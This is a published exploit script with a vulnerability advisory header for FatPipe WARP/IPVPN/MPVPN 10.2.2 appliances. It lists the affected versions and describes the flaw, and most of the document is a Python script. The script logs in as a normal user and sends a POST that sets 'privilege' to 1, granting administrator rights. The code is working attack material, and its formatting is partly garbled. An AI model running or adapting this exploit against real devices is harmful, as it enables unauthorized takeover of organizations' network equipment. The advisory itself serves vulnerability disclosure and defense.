# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation# Date: 25.07.2021# Exploit Author: LiquidWorm# Vendor Homepage: https://www.fatpipeinc.com#!/usr/bin/env python3### FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation### Vendor: FatPipe Networks Inc.# Product web page: https://www.fatpipeinc.com# Affected version: WARP / IPVPN / MPVPN# 10.2.2r38# 10.2.2r25# 10.2.2r10# 10.1.2r60p82# 10.1.2r60p71# 10.1.2r60p65# 10.1.2r60p58s1# 10.1.2r60p58# 10.1.2r60p55# 10.1.2r60p45# 10.1.2r60p35# 10.1.2r60p32# 10.1.2r60p13# 10.1.2r60p10# 9.1.2r185# 9.1.2r180p2# 9.1.2r165# 9.1.2r164p5# 9.1.2r164p4# 9.1.2r164# 9.1.2r161p26# 9.1.2r161p20# 9.1.2r161p17# 9.1.2r161p16# 9.1.2r161p12# 9.1.2r161p3# 9.1.2r161p2# 9.1.2r156# 9.1.2r150# 9.1.2r144# 9.1.2r129# 7.1.2r39# 6.1.2r70p75-m# 6.1.2r70p45-m# 6.1.2r70p26# 5.2.0r34## Summary: FatPipe Networks invented the concept of router-clustering,# which provides the highest level of reliability, redundancy, and speed# of Internet traffic for Business Continuity and communications. FatPipe# WARP achieves fault tolerance for companies by creating an easy method# of combining two or more Internet connections of any kind over multiple# ISPs. FatPipe utilizes all paths when the lines are up and running,# dynamically balancing traffic over the multiple lines, and intelligently# failing over inbound and outbound IP traffic when ISP services and/or# components fail.## FatPipe IPVPN balances load and provides reliability among multiple# managed and CPE based VPNs as well as dedicated private networks. FatPipe# IPVPN can also provide you an easy low-cost migration path from private# line, Frame or Point-to-Point networks. You can aggregate multiple private,# MPLS and public networks without additional equipment at the provider's# site.## FatPipe MPVPN, a patented router clustering device, is an essential part# of Disaster Recovery and Business Continuity Planning for Virtual Private# Network (VPN) connectivity. It makes any VPN up to 900% more secure and# 300% times more reliable, redundant and faster. MPVPN can take WANs with# an uptime of 99.5% or less and make them 99.999988% or higher, providing# a virtually infallible WAN. MPVPN dynamically balances load over multiple# lines and ISPs without the need for BGP programming. MPVPN aggregates up# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed# you need to keep your VPN up and running despite failures of service, line,# software, or hardware.## Desc: The application suffers from a privilege escalation vulnerability.# A normal user (group USER, 0) can elevate her privileges by sending a HTTP# POST request and setting the JSON parameter 'privilege' to integer value# '1' gaining administrativerights (group ADMINISTRATOR, 1).## Tested on: Apache-Coyote/1.1### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2021-5685# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php### 30.05.2016# 25.07.2021##import sys
import time#######import requests################
requests.packages.urllib3.disable_warnings()iflen(sys.argv)!=2:printprint("********************************************************")print("**")print("* Privilege escalation from USER to ADMINISTRATOR role *")print("*in*")print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")print("**")print("* ZSL-2021-5685*")print("**")print("********************************************************")print("\n[POR] Usage: ./escalator.py [IP]")
sys.exit()
ajpi=sys.argv[1]print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")
sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua':'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"','Accept':'application/json, text/javascript, */*; q=0.01','X-Requested-With':'XMLHttpRequest','Sec-Ch-Ua-Mobile':'?0','User-Agent':'Fatnet/1.b','Content-Type':'application/x-www-form-urlencoded; charset=UTF-8','Origin':'https://'+ajpi,'Sec-Fetch-Site':'same-origin','Sec-Fetch-Mode':'cors','Sec-Fetch-Dest':'empty','Referer':'https://'+ajpi+'/fpui/dataCollectionServlet','Accept-Encoding':'gzip, deflate','Accept-Language':'en-US,en;q=0.9','Connection':'close'}
juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)ifnot'success'in alo.text:print('[GRE] Login error.')
sys.exit()else:print('[POR] Authentication successful.')print('[POR] Climbing the ladder...')
sluba='''
|||| .--._
||====|| __ '---._)
||||"")\ Q Q )
||====|| =_/ o/
|||| | \_.-;-'-,._
||====|| |'o---o )
||||\ /H __H\/
||====|| '-' \"")\/|
|||| _ |_='-)_/
||====||/'.)
|||| / /
||====|||___/\| /
|||| |_|| |
||====||/)\\ \\
|||| (__/\___\\
||====|| \_\\
|||| /)
||====||(__/
'''for k in sluba:
sys.stdout.write(k)
sys.stdout.flush()
time.sleep(0.01)
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)ifnot'true'in stanje.text:print('\n[GRE] Something\'s fishy!')
sys.exit()else:print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()
